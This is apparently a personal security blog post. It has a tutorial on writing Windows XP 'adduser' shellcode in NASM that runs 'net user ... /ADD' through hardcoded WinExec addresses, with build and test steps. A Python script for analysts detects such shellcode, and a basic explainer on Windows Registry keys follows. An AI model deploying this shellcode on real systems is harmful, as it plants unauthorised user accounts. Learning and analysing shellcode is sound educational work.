My first shellcode was in two registers: the adduser shellcode!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

I had always wanted to learn to write simple shellcode in assembly language. Writing shellcode was not my first interest, though; my interest was exploit writing. I had to learn assembly for various reasons: understanding how the computer works, using a debugger effectively, exploit writing, fun, etc. So I searched Google a lot for “writing shellcode” and, fortunately, found some amazing tutorials (see References). I will explain each line of my first shellcode below. Before that, here are the tools I used to write this shellcode:

1. Nasm: www.nasm.us

2. arwin: http://www.vividmachines.com/shellcode/arwin.c

3. xxd-shellcode: http://www.projectshellcode.com/downloads/xxd-shellcode.sh

4. shellcode-test: http://www.vividmachines.com/shellcode/shellcodetest.c

The shellcode:

; adduser shellcode. Only works on Windows XP SP3 (hardcoded kernel32 addresses). Written by pusheax.com
[BITS 32]

global _start

section .text

_start:
    jmp short command      ; jump over the function; no return address is pushed

function:                  ; Label
    ; WinExec("Command to execute", NULL)
    pop ecx                ; ecx = address of the command string (pushed by "call function")
    xor eax,eax            ; eax = 0 without emitting a null byte
    push eax               ; second parameter (NULL), pushed first
    push ecx               ; first parameter: pointer to the command string
    mov eax,0x7c8623ad     ; address of kernel32!WinExec (found with arwin)
    call eax

    ; ExitProcess(0) so the process ends cleanly after the command runs
    xor eax,eax
    push eax               ; exit code 0
    mov eax,0x7c81cafa     ; address of kernel32!ExitProcess (found with arwin)
    call eax

command:                   ; Label
    call function          ; pushes the address of the string below, then jumps to function
    db "cmd.exe /c net user pusheax popebp /ADD"
    db 0x00                ; null terminator for the string


So let me explain each line:

[BITS 32]: tells nasm that the code is 32-bit.

global _start: declares the main starting label.

section .text: declares the code section.

jmp short command: the jmp instruction jumps to the label called “command”. A “call” cannot be used here, because “call” would save the address of the next instruction on the stack in order to return to it later. This is a really common trick when writing shellcode: jump to the “command” label and leave no return address on the stack.

So now we are in label “command”, which holds the following instructions:

call function: calls the “function” label and saves the address of the next instruction on the stack as the return address. The next “instruction” is simply the system command:

 db “cmd.exe /c net user pusheax popebp /ADD”

So now we are in label “function”.
There is one simple Windows API we need to call, WinExec(), http://msdn.microsoft.com/en-us/library/windows/desktop/ms687393%28v=vs.85%29.aspx . It only requires two parameters.

pop ecx: takes the current return address (the address of the command string) into ecx and removes it from the stack.

xor eax,eax: clears the eax register to 0. We could push 0 onto the stack directly, but that would clearly produce null bytes, so most shellcoders use xor.

push eax: pushes 0 onto the stack. Since the stack is LIFO, this will be the last parameter.

push ecx: do you remember that we popped an address into ecx? ecx actually holds the address of “cmd.exe /c net user pusheax popebp /ADD”. We need to push this string onto the stack as WinExec()'s first parameter. Currently the stack holds: WinExec(“cmd.exe /c net user pusheax popebp /ADD”, NULL).

mov eax,0x7c8623ad: 0x7c8623ad is the address of WinExec(). Move this address into eax. I found this address using arwin.exe (./arwin.exe Kernel32.dll WinExec).

call eax: eax = WinExec(), so this executes the API function.

xor eax,eax: clears the eax register, because we are going to terminate the current process soon. We call ExitProcess() to exit the current process; otherwise the shellcode may get corrupted, which you can see in a debugger.

push eax: as above, we push the last parameter onto the stack.

mov eax,0x7c81cafa: as above, I used arwin to find the address of ExitProcess().

call eax: eax = ExitProcess's address; calling eax executes the function.
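The jmp/call/pop trick and the hardcoded API addresses explained above are also what an analyst looks for when an unknown blob of shellcode turns up in a crash dump or capture. The following Python is an added example (not from the original post): it scans a byte buffer for a CALL whose target is a POP, recovers the string sitting right behind the CALL, collects `mov eax,imm32 / call eax` targets, and reports null bytes. The sample bytes are my own hand-assembly of the listing above and should be treated as an assumption.

```python
import struct

# Constructed sample: the adduser listing above, hand-assembled by me
# (assumption: nasm emits these exact encodings; bytes are not from the post).
SAMPLE = (
    b"\xeb\x16"                  # jmp short command
    b"\x59"                      # function: pop ecx
    b"\x31\xc0\x50\x51"          # xor eax,eax ; push eax ; push ecx
    b"\xb8\xad\x23\x86\x7c"      # mov eax,0x7c8623ad (WinExec)
    b"\xff\xd0"                  # call eax
    b"\x31\xc0\x50"              # xor eax,eax ; push eax
    b"\xb8\xfa\xca\x81\x7c"      # mov eax,0x7c81cafa (ExitProcess)
    b"\xff\xd0"                  # call eax
    b"\xe8\xe5\xff\xff\xff"      # command: call function (rel32 = -27)
    b"cmd.exe /c net user pusheax popebp /ADD\x00"
)

def find_call_pop_strings(code):
    """Return (call_offset, pop_offset, text) for each CALL rel32 whose target
    is a POP r32 and whose return address points at a printable C string."""
    hits = []
    for i in range(len(code) - 4):
        if code[i] != 0xE8:                      # CALL rel32 opcode
            continue
        rel = struct.unpack_from("<i", code, i + 1)[0]
        target = i + 5 + rel
        if not (0 <= target < len(code)) or not 0x58 <= code[target] <= 0x5F:
            continue                             # target is not POP eax..edi
        # The pushed "return address" is the byte right after the CALL: the
        # string the POP picks up. Read it up to its null terminator.
        end = code.find(b"\x00", i + 5)
        text = code[i + 5:end if end != -1 else len(code)]
        if len(text) >= 4 and all(0x20 <= b < 0x7F for b in text):
            hits.append((i, target, text.decode("ascii")))
    return hits

def hardcoded_call_targets(code):
    """Immediates of 'mov eax,imm32' immediately followed by 'call eax':
    absolute API addresses, which tie the code to one Windows build."""
    return [struct.unpack_from("<I", code, i + 1)[0]
            for i in range(len(code) - 6)
            if code[i] == 0xB8 and code[i + 5:i + 7] == b"\xff\xd0"]

def null_byte_offsets(code):
    """Offsets of 0x00 bytes, which break string-copy based delivery."""
    return [i for i, b in enumerate(code) if b == 0]

if __name__ == "__main__":
    for off, pop, text in find_call_pop_strings(SAMPLE):
        print(f"call@{off} -> pop@{pop}: {text!r}")
    print([hex(a) for a in hardcoded_call_targets(SAMPLE)])
    print("null bytes at", null_byte_offsets(SAMPLE))
```

On the sample this reports the call at offset 24 landing on the pop at offset 2, the two kernel32 addresses, and the single null byte at offset 68 (the terminator the listing adds with db 0x00).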

Test

1. nasm -f bin -o shellcode.bin <your .asm file>
2. ./xxd-shellcode.sh shellcode.bin
3. Paste the output into shellcode-test.c.
4. Compile with MinGW, execute, then check for the new user name :).

References:

https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/

http://projectshellcode.com/node/20

WINDOWS REGISTRY


The Windows Registry is a database that stores all kinds of Windows system configuration: the kernel, devices, user configuration, etc.
As a penetration tester or an advanced system administrator we need a clear understanding of the Windows Registry, because often we need to configure the system manually. That is why I am going to explain the basics of the Windows Registry, which I learned from various resources, experience and self-study.
How the Registry interacts with the Windows system:
  • The boot configuration is stored in the Windows Registry. Whenever the Windows system boots, it first reads all the configuration from the registry hive and loads it into memory. Then it is the kernel's turn!
  • When the kernel starts initializing, it first reads other configuration such as the device configuration.
  • Then it starts reading other required configuration such as the user configuration, wallpaper, screen saver, etc.
A great deal of information is stored in the registry, and keeping it all in one format would be horrible, so registry values have different data types. Here are a few of them:
REG_NONE == NONE VALUE
REG_SZ == UNICODE STRING
REG_BINARY == BINARY DATA
REG_DWORD == 32 bit NUMBER (Double Word Number)
REG_DWORD_BIG_ENDIAN == A DWORD value, a 32-bit unsigned integer
REG_LINK == Symbolic Link
REG_FULL_RESOURCE_DESCRIPTOR == Hardware Description
REG_QWORD == 64 bit Number
And The ROOT KEYS:
  • HKEY_CLASSES_ROOT
  • HKEY_CURRENT_USER
  • HKEY_LOCAL_MACHINE
  • HKEY_USERS
  • HKEY_CURRENT_CONFIG
Let's explain these root keys below.
HKEY_CLASSES_ROOT: abbreviated HKCR, HKEY_CLASSES_ROOT contains information about registered applications, such as file associations and OLE Object Class IDs, tying them to the applications used to handle these items.
HKEY_CURRENT_USER:
Here all the configuration of the currently logged-in user is stored.
There are 12 subkeys under HKEY_CURRENT_USER:
AppEvents == Sound/Event
Console == Window settings such as screen colour, width, font size, etc.
Control Panel == Wallpaper, screensaver, mouse, etc.
Environment == Environment variable definitions
EUDC ==
Identities ==
Keyboard Layout == Keyboard Layout (I.E U.S)
Network == Network Driver Setting
Printers == Printer Connection setting
Software == User-specific software information
System ==
Volatile Environment ==
HKEY_LOCAL_MACHINE:
All the system configuration, such as HARDWARE, SAM, SOFTWARE, the computer name, etc., is stored in this root key.
Malware, backdoors, keyloggers and other malicious software also target this key.
HKEY_USERS:
HKEY_USERS contains subkeys corresponding to the HKEY_CURRENT_USER keys for each user profile actively loaded on the machine, though user hives are usually only loaded for currently logged-in users.
If logged in as “weird science”, I can see there is a subkey for that user (screenshots omitted).
HKEY_CURRENT_CONFIG:
Perhaps this one does not need explaining. If you still want to know about it, please search on Google. 🙂
Hives:
Quoting Microsoft: A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data.

Each time a new user logs on to a computer, a new hive is created for that user with a separate file for the user profile. This is called the user profile hive. A user's hive contains specific registry information pertaining to the user's application settings, desktop, environment, network connections, and printers. User profile hives are located under the HKEY_USERS key. More: http://msdn.microsoft.com/en-us/library/windows/desktop/ms724877%28v=vs.85%29.aspx

Next I will explain some security tasks in the Windows Registry, once I have some security-related work in the registry; hopefully soon 🙂. Stay tuned!
Feel free to post any questions you have about the Windows Registry! 🙂
Reference: